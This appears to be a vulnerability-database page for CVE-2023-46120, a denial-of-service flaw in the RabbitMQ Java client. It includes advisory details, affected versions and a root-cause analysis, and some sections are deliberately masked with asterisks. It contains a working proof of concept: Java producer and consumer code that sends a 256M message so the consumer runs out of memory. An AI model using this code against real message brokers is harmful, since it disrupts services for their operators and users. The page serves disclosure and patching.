4.9

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-46120

GHSA ID

GHSA-mm8h-8587-p46h

EPSS Score

0.61201%

CWE

CWE-400

Published

10/24/2023

Updated

11/5/2023

KEV Status

Technology

Java

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2023-46120

CVE-2023-46120: RabbitMQ Java client's Lack of Message Size Limitation leads to Remote DoS Attack

Summary

maxBodyLebgth was not used when receiving Message objects. Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.

PoC

RbbitMQ

Use RabbitMQ 3.11.16 as MQ and specify Message Body size 512M (here it only needs to be larger than the Consumer memory)
Start RabbitMQ

Producer

Build a String of length 256M and send it to Consumer


package org.springframework.amqp.helloworld; 

import org.springframework.amqp.core.AmqpTemplate; 
import org.springframework.context.ApplicationContext; 
import org.springframework.context.annotation.AnnotationConfigApplicationContext; 

public class Producer {
    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class); 
        String s = "A";
        for(int i=0;i<28;++i){
            s = s + s;
            System.out.println(i);
        }
        amqpTemplate.convertAndSend(s);
        System.out.println("Send Finish");
    }
 }

Consumer

First set the heap memory size to 128M
Read the message sent by the Producer from the MQ and print the length

package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.amqp.core.Message;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Consumer {
    
    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
        Object o = amqpTemplate.receiveAndConvert();
        if(o != null){
            String s = o.toString();
            System.out.println("Received Length : " + s.length());
        }else{
            System.out.println("null");
        }
    }
}

Results

Run the Producer first, then the Consumer
Consumer throws OOM Exception

Impact

Users of RabbitMQ may suffer from DoS attacks from RabbitMQ Java client which will ultimately exhaust the memory of the consumer.

(GitHub Advisory)

4.9

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-46120

GHSA ID

GHSA-mm8h-8587-p46h

EPSS Score

0.61201%

CWE

CWE-400

Published

10/24/2023

Updated

11/5/2023

KEV Status

Technology

Java

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
com.rabbitmq:amqp-client	maven	< 5.18.0	5.18.0

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stemmed from missing message size checks during frame/message processing. The patch introduced maxInboundMessageBodySize validation in these critical path functions:

CommandAssembler.consumeHeaderFrame added explicit body size check
Frame.readFrom added payload size validation
SocketFrameHandler propagates size limit to frame reading
AMQCommand constructors now enforce size limits via CommandAssembler
AMQChannel initializes commands with size constraints These functions directly handled message ingestion without size restrictions pre-patch, making them root causes of the OOM vulnerability.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry `m*x*o*yL***t*` w*s not us** w**n r***ivin* M*ss*** o*j**ts. *tt**k*rs *oul* just s*n* * v*ry l*r** M*ss*** **usin* * m*mory ov*r*low *n* tri***rin* *n OOM *rror. ### Po* #### R**itMQ * Us* R***itMQ *.**.** *s MQ *n* sp**i*y M*ss*** *o*

Reasoning

T** vuln*r**ility st*mm** *rom missin* m*ss*** siz* ****ks *urin* *r*m*/m*ss*** pro**ssin*. T** p*t** intro*u*** m*xIn*oun*M*ss****o*ySiz* v*li**tion in t**s* *riti**l p*t* *un*tions: *. *omm*n**ss*m*l*r.*onsum******r*r*m* ***** *xpli*it *o*y siz* **

4.9

Basic Information

Concerned about an active attack path?

CVE-2023-46120: RabbitMQ Java client's Lack of Message Size Limitation leads to Remote DoS Attack

Summary

PoC

RbbitMQ

Producer

Consumer

Results

Impact

4.9

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI